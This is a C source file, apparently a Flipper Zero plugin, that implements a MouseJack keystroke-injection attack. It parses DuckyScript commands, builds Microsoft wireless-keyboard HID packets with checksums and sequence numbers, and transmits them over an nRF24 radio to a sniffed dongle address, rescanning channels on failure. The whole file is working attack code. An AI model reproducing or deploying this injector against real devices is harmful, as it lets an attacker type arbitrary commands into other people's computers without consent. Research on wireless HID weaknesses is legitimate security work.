mousejacker_ducky.c 17 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253254255256257258259260261262263264265266267268269270271272273274275276277278279280281282283284285286287288289290291292293294295296297298299300301302303304305306307308309310311312313314315316317318319320321322323324325326327328329330331332333334335336337338339340341342343344345346347348349350351352353354355356357358359360361362363364365366367368369370371372373374375376377378379380381382383384385386387388389390391392393394
  1. #include "mousejacker_ducky.h"
  2. static const char ducky_cmd_comment[] = {"REM"};
  3. static const char ducky_cmd_delay[] = {"DELAY "};
  4. static const char ducky_cmd_string[] = {"STRING "};
  5. static const char ducky_cmd_repeat[] = {"REPEAT "};
  6. // Bytes 0 to 3 are hardcoded for my specific mouse (they should be known after the sniffing but addresses.txt doesn't save them)
  7. static uint8_t MICROSOFT_HID_TEMPLATE[] =
  8. {0x08, 0x90, 0x19, 0x01, 0x00, 0x00, 67, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
  9. uint8_t prev_hid = 0;
  10. uint8_t sequence_num = 0;
  11. #define RT_THRESHOLD 50
  12. #define MICROSOFT_MIN_CHANNEL 2
  13. #define MICROSOFT_MAX_CHANNEL 83
  14. #define MICROSOFT_HID_TEMPLATE_SIZE 19
  15. #define TAG "mousejacker_ducky"
  16. MJDuckyKey mj_ducky_keys[] = {{" ", 44, 0}, {"!", 30, 2}, {"\"", 52, 2},
  17. {"#", 32, 2}, {"$", 33, 2}, {"%", 34, 2},
  18. {"&", 36, 2}, {"'", 52, 0}, {"(", 38, 2},
  19. {")", 39, 2}, {"*", 37, 2}, {"+", 46, 2},
  20. {",", 54, 0}, {"-", 45, 0}, {".", 55, 0},
  21. {"/", 56, 0}, {"0", 39, 0}, {"1", 30, 0},
  22. {"2", 31, 0}, {"3", 32, 0}, {"4", 33, 0},
  23. {"5", 34, 0}, {"6", 35, 0}, {"7", 36, 0},
  24. {"8", 37, 0}, {"9", 38, 0}, {":", 51, 2},
  25. {";", 51, 0}, {"<", 54, 2}, {"=", 46, 0},
  26. {">", 55, 2}, {"?", 56, 2}, {"@", 31, 2},
  27. {"A", 4, 2}, {"B", 5, 2}, {"C", 6, 2},
  28. {"D", 7, 2}, {"E", 8, 2}, {"F", 9, 2},
  29. {"G", 10, 2}, {"H", 11, 2}, {"I", 12, 2},
  30. {"J", 13, 2}, {"K", 14, 2}, {"L", 15, 2},
  31. {"M", 16, 2}, {"N", 17, 2}, {"O", 18, 2},
  32. {"P", 19, 2}, {"Q", 20, 2}, {"R", 21, 2},
  33. {"S", 22, 2}, {"T", 23, 2}, {"U", 24, 2},
  34. {"V", 25, 2}, {"W", 26, 2}, {"X", 27, 2},
  35. {"Y", 28, 2}, {"Z", 29, 2}, {"[", 47, 0},
  36. {"\\", 49, 0}, {"]", 48, 0}, {"^", 35, 2},
  37. {"_", 45, 2}, {"`", 53, 0}, {"a", 4, 0},
  38. {"b", 5, 0}, {"c", 6, 0}, {"d", 7, 0},
  39. {"e", 8, 0}, {"f", 9, 0}, {"g", 10, 0},
  40. {"h", 11, 0}, {"i", 12, 0}, {"j", 13, 0},
  41. {"k", 14, 0}, {"l", 15, 0}, {"m", 16, 0},
  42. {"n", 17, 0}, {"o", 18, 0}, {"p", 19, 0},
  43. {"q", 20, 0}, {"r", 21, 0}, {"s", 22, 0},
  44. {"t", 23, 0}, {"u", 24, 0}, {"v", 25, 0},
  45. {"w", 26, 0}, {"x", 27, 0}, {"y", 28, 0},
  46. {"z", 29, 0}, {"{", 47, 2}, {"|", 49, 2},
  47. {"}", 48, 2}, {"~", 53, 2}, {"BACKSPACE", 42, 0},
  48. {"", 0, 0}, {"ALT", 0, 4}, {"SHIFT", 0, 2},
  49. {"CTRL", 0, 1}, {"GUI", 0, 8}, {"SCROLLLOCK", 71, 0},
  50. {"ENTER", 40, 0}, {"F12", 69, 0}, {"HOME", 74, 0},
  51. {"F10", 67, 0}, {"F9", 66, 0}, {"ESCAPE", 41, 0},
  52. {"PAGEUP", 75, 0}, {"TAB", 43, 0}, {"PRINTSCREEN", 70, 0},
  53. {"F2", 59, 0}, {"CAPSLOCK", 57, 0}, {"F1", 58, 0},
  54. {"F4", 61, 0}, {"F6", 63, 0}, {"F8", 65, 0},
  55. {"DOWNARROW", 81, 0}, {"DELETE", 42, 0}, {"RIGHT", 79, 0},
  56. {"F3", 60, 0}, {"DOWN", 81, 0}, {"DEL", 76, 0},
  57. {"END", 77, 0}, {"INSERT", 73, 0}, {"F5", 62, 0},
  58. {"LEFTARROW", 80, 0}, {"RIGHTARROW", 79, 0}, {"PAGEDOWN", 78, 0},
  59. {"PAUSE", 72, 0}, {"SPACE", 44, 0}, {"UPARROW", 82, 0},
  60. {"F11", 68, 0}, {"F7", 64, 0}, {"UP", 82, 0},
  61. {"LEFT", 80, 0}};
  62. /*
  63. static bool mj_ducky_get_number(const char* param, uint32_t* val) {
  64. uint32_t value = 0;
  65. if(sscanf(param, "%lu", &value) == 1) {
  66. *val = value;
  67. return true;
  68. }
  69. return false;
  70. }
  71. */
  72. static uint32_t mj_ducky_get_command_len(const char* line) {
  73. uint32_t len = strlen(line);
  74. for(uint32_t i = 0; i < len; i++) {
  75. if(line[i] == ' ') return i;
  76. }
  77. return 0;
  78. }
  79. static bool mj_get_ducky_key(char* key, size_t keylen, MJDuckyKey* dk) {
  80. //FURI_LOG_D(TAG, "looking up key %s with length %d", key, keylen);
  81. for(uint i = 0; i < sizeof(mj_ducky_keys) / sizeof(MJDuckyKey); i++) {
  82. if(!strncmp(mj_ducky_keys[i].name, key, keylen)) {
  83. memcpy(dk, &mj_ducky_keys[i], sizeof(MJDuckyKey));
  84. return true;
  85. }
  86. }
  87. return false;
  88. }
  89. static void checksum(uint8_t* payload, uint len) {
  90. // MS checksum algorithm - as per KeyKeriki paper
  91. payload[len - 1] = 0x00;
  92. for(uint n = 0; n < len - 2; n++) payload[len - 1] ^= payload[n];
  93. payload[len - 1] = ~payload[len - 1] & 0xff;
  94. }
  95. static void sequence(uint8_t* payload) {
  96. // MS frames use a 2 bytes sequence number
  97. payload[5] = (sequence_num >> 8) & 0xff;
  98. payload[4] = sequence_num & 0xff;
  99. sequence_num += 1;
  100. }
  101. static void inject_packet(
  102. FuriHalSpiBusHandle* handle,
  103. uint8_t* addr,
  104. uint8_t addr_size,
  105. uint8_t rate,
  106. uint8_t* payload,
  107. size_t payload_size,
  108. PluginState* plugin_state) {
  109. uint8_t rt_count = 0;
  110. while(1) {
  111. if(!plugin_state->is_thread_running || plugin_state->close_thread_please) {
  112. return;
  113. }
  114. if(nrf24_txpacket(handle, payload, payload_size, true)) {
  115. break;
  116. }
  117. rt_count++;
  118. // retransmit threshold exceeded, scan for new channel
  119. if(rt_count > RT_THRESHOLD) {
  120. if(nrf24_find_channel(
  121. handle,
  122. addr,
  123. addr,
  124. addr_size,
  125. rate,
  126. MICROSOFT_MIN_CHANNEL,
  127. MICROSOFT_MAX_CHANNEL,
  128. true) > MICROSOFT_MAX_CHANNEL) {
  129. return; // fail
  130. }
  131. //FURI_LOG_D("mj", "find channel passed, %d", tessst);
  132. rt_count = 0;
  133. }
  134. }
  135. }
  136. static void build_hid_packet(uint8_t mod, uint8_t hid, uint8_t* payload) {
  137. memcpy(payload, MICROSOFT_HID_TEMPLATE, MICROSOFT_HID_TEMPLATE_SIZE);
  138. payload[7] = mod;
  139. payload[9] = hid;
  140. sequence(payload);
  141. checksum(payload, MICROSOFT_HID_TEMPLATE_SIZE);
  142. /*uint8_t byte;
  143. uint8_t i;
  144. FURI_LOG_I(TAG, "build_hid_packet");
  145. for(i=0; i < MICROSOFT_HID_TEMPLATE_SIZE; i++) {
  146. byte = payload[i];
  147. FURI_LOG_I(TAG, "%02x ", byte);
  148. }*/
  149. }
  150. static void send_hid_packet(
  151. FuriHalSpiBusHandle* handle,
  152. uint8_t* addr,
  153. uint8_t addr_size,
  154. uint8_t rate,
  155. uint8_t mod,
  156. uint8_t hid,
  157. PluginState* plugin_state) {
  158. uint8_t hid_payload[MICROSOFT_HID_TEMPLATE_SIZE] = {0};
  159. build_hid_packet(0, 0, hid_payload);
  160. if(hid == prev_hid)
  161. inject_packet(
  162. handle,
  163. addr,
  164. addr_size,
  165. rate,
  166. hid_payload,
  167. MICROSOFT_HID_TEMPLATE_SIZE,
  168. plugin_state); // empty hid packet
  169. prev_hid = hid;
  170. build_hid_packet(mod, hid, hid_payload);
  171. inject_packet(
  172. handle, addr, addr_size, rate, hid_payload, MICROSOFT_HID_TEMPLATE_SIZE, plugin_state);
  173. furi_delay_ms(12);
  174. }
  175. // returns false if there was an error processing script line
  176. static bool mj_process_ducky_line(
  177. FuriHalSpiBusHandle* handle,
  178. uint8_t* addr,
  179. uint8_t addr_size,
  180. uint8_t rate,
  181. char* line,
  182. char* prev_line,
  183. PluginState* plugin_state) {
  184. MJDuckyKey dk;
  185. uint8_t hid_payload[MICROSOFT_HID_TEMPLATE_SIZE] = {0};
  186. char* line_tmp = line;
  187. uint32_t line_len = strlen(line);
  188. if(!plugin_state->is_thread_running || plugin_state->close_thread_please) {
  189. return true;
  190. }
  191. for(uint32_t i = 0; i < line_len; i++) {
  192. if((line_tmp[i] != ' ') && (line_tmp[i] != '\t') && (line_tmp[i] != '\n')) {
  193. line_tmp = &line_tmp[i];
  194. break; // Skip spaces and tabs
  195. }
  196. if(i == line_len - 1) return true; // Skip empty lines
  197. }
  198. FURI_LOG_D(TAG, "line: %s", line_tmp);
  199. // General commands
  200. if(strncmp(line_tmp, ducky_cmd_comment, strlen(ducky_cmd_comment)) == 0) {
  201. // REM - comment line
  202. return true;
  203. } else if(strncmp(line_tmp, ducky_cmd_delay, strlen(ducky_cmd_delay)) == 0) {
  204. // DELAY
  205. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  206. uint32_t delay_val = 0;
  207. delay_val = atoi(line_tmp);
  208. if(delay_val > 0) {
  209. uint32_t delay_count = delay_val / 10;
  210. build_hid_packet(0, 0, hid_payload);
  211. inject_packet(
  212. handle,
  213. addr,
  214. addr_size,
  215. rate,
  216. hid_payload,
  217. MICROSOFT_HID_TEMPLATE_SIZE,
  218. plugin_state); // empty hid packet
  219. for(uint32_t i = 0; i < delay_count; i++) {
  220. if(!plugin_state->is_thread_running || plugin_state->close_thread_please) {
  221. return true;
  222. }
  223. /*inject_packet(
  224. handle,
  225. addr,
  226. addr_size,
  227. rate,
  228. LOGITECH_KEEPALIVE,
  229. LOGITECH_KEEPALIVE_SIZE,
  230. plugin_state);*/
  231. furi_delay_ms(10);
  232. }
  233. return true;
  234. }
  235. return false;
  236. } else if(strncmp(line_tmp, ducky_cmd_string, strlen(ducky_cmd_string)) == 0) {
  237. // STRING
  238. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  239. for(size_t i = 0; i < strlen(line_tmp); i++) {
  240. if(!mj_get_ducky_key(&line_tmp[i], 1, &dk)) return false;
  241. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  242. }
  243. return true;
  244. } else if(strncmp(line_tmp, ducky_cmd_repeat, strlen(ducky_cmd_repeat)) == 0) {
  245. // REPEAT
  246. uint32_t repeat_cnt = 0;
  247. if(prev_line == NULL) return false;
  248. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  249. repeat_cnt = atoi(line_tmp);
  250. if(repeat_cnt < 2) return false;
  251. FURI_LOG_D(TAG, "repeating %s %ld times", prev_line, repeat_cnt);
  252. for(uint32_t i = 0; i < repeat_cnt; i++)
  253. mj_process_ducky_line(handle, addr, addr_size, rate, prev_line, NULL, plugin_state);
  254. return true;
  255. } else if(strncmp(line_tmp, "ALT", strlen("ALT")) == 0) {
  256. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  257. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  258. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 4, dk.hid, plugin_state);
  259. return true;
  260. } else if(
  261. strncmp(line_tmp, "GUI", strlen("GUI")) == 0 ||
  262. strncmp(line_tmp, "WINDOWS", strlen("WINDOWS")) == 0 ||
  263. strncmp(line_tmp, "COMMAND", strlen("COMMAND")) == 0) {
  264. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  265. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  266. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 8, dk.hid, plugin_state);
  267. return true;
  268. } else if(
  269. strncmp(line_tmp, "CTRL-ALT", strlen("CTRL-ALT")) == 0 ||
  270. strncmp(line_tmp, "CONTROL-ALT", strlen("CONTROL-ALT")) == 0) {
  271. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  272. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  273. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 4 | 1, dk.hid, plugin_state);
  274. return true;
  275. } else if(
  276. strncmp(line_tmp, "CTRL-SHIFT", strlen("CTRL-SHIFT")) == 0 ||
  277. strncmp(line_tmp, "CONTROL-SHIFT", strlen("CONTROL-SHIFT")) == 0) {
  278. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  279. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  280. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 1 | 2, dk.hid, plugin_state);
  281. return true;
  282. } else if(
  283. strncmp(line_tmp, "CTRL", strlen("CTRL")) == 0 ||
  284. strncmp(line_tmp, "CONTROL", strlen("CONTROL")) == 0) {
  285. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  286. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  287. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 1, dk.hid, plugin_state);
  288. return true;
  289. } else if(strncmp(line_tmp, "SHIFT", strlen("SHIFT")) == 0) {
  290. line_tmp = &line_tmp[mj_ducky_get_command_len(line_tmp) + 1];
  291. if(!mj_get_ducky_key(line_tmp, strlen(line_tmp), &dk)) return false;
  292. send_hid_packet(handle, addr, addr_size, rate, dk.mod | 2, dk.hid, plugin_state);
  293. return true;
  294. } else if(
  295. strncmp(line_tmp, "ESC", strlen("ESC")) == 0 ||
  296. strncmp(line_tmp, "APP", strlen("APP")) == 0 ||
  297. strncmp(line_tmp, "ESCAPE", strlen("ESCAPE")) == 0) {
  298. if(!mj_get_ducky_key("ESCAPE", 6, &dk)) return false;
  299. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  300. return true;
  301. } else if(strncmp(line_tmp, "ENTER", strlen("ENTER")) == 0) {
  302. if(!mj_get_ducky_key("ENTER", 5, &dk)) return false;
  303. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  304. return true;
  305. } else if(
  306. strncmp(line_tmp, "UP", strlen("UP")) == 0 ||
  307. strncmp(line_tmp, "UPARROW", strlen("UPARROW")) == 0) {
  308. if(!mj_get_ducky_key("UP", 2, &dk)) return false;
  309. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  310. return true;
  311. } else if(
  312. strncmp(line_tmp, "DOWN", strlen("DOWN")) == 0 ||
  313. strncmp(line_tmp, "DOWNARROW", strlen("DOWNARROW")) == 0) {
  314. if(!mj_get_ducky_key("DOWN", 4, &dk)) return false;
  315. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  316. return true;
  317. } else if(
  318. strncmp(line_tmp, "LEFT", strlen("LEFT")) == 0 ||
  319. strncmp(line_tmp, "LEFTARROW", strlen("LEFTARROW")) == 0) {
  320. if(!mj_get_ducky_key("LEFT", 4, &dk)) return false;
  321. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  322. return true;
  323. } else if(
  324. strncmp(line_tmp, "RIGHT", strlen("RIGHT")) == 0 ||
  325. strncmp(line_tmp, "RIGHTARROW", strlen("RIGHTARROW")) == 0) {
  326. if(!mj_get_ducky_key("RIGHT", 5, &dk)) return false;
  327. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  328. return true;
  329. } else if(strncmp(line_tmp, "SPACE", strlen("SPACE")) == 0) {
  330. if(!mj_get_ducky_key("SPACE", 5, &dk)) return false;
  331. send_hid_packet(handle, addr, addr_size, rate, dk.mod, dk.hid, plugin_state);
  332. return true;
  333. }
  334. return false;
  335. }
  336. void mj_process_ducky_script(
  337. FuriHalSpiBusHandle* handle,
  338. uint8_t* addr,
  339. uint8_t addr_size,
  340. uint8_t rate,
  341. char* script,
  342. PluginState* plugin_state) {
  343. uint8_t hid_payload[MICROSOFT_HID_TEMPLATE_SIZE] = {0};
  344. char* prev_line = NULL;
  345. /*inject_packet(
  346. handle, addr, addr_size, rate, LOGITECH_HELLO, LOGITECH_HELLO_SIZE, plugin_state);*/
  347. char* line = strtok(script, "\n");
  348. while(line != NULL) {
  349. if(strcmp(&line[strlen(line) - 1], "\r") == 0) line[strlen(line) - 1] = (char)0;
  350. if(!mj_process_ducky_line(handle, addr, addr_size, rate, line, prev_line, plugin_state))
  351. FURI_LOG_D(TAG, "unable to process ducky script line: %s", line);
  352. prev_line = line;
  353. line = strtok(NULL, "\n");
  354. }
  355. build_hid_packet(0, 0, hid_payload);
  356. inject_packet(
  357. handle,
  358. addr,
  359. addr_size,
  360. rate,
  361. hid_payload,
  362. MICROSOFT_HID_TEMPLATE_SIZE,
  363. plugin_state); // empty hid packet at end
  364. }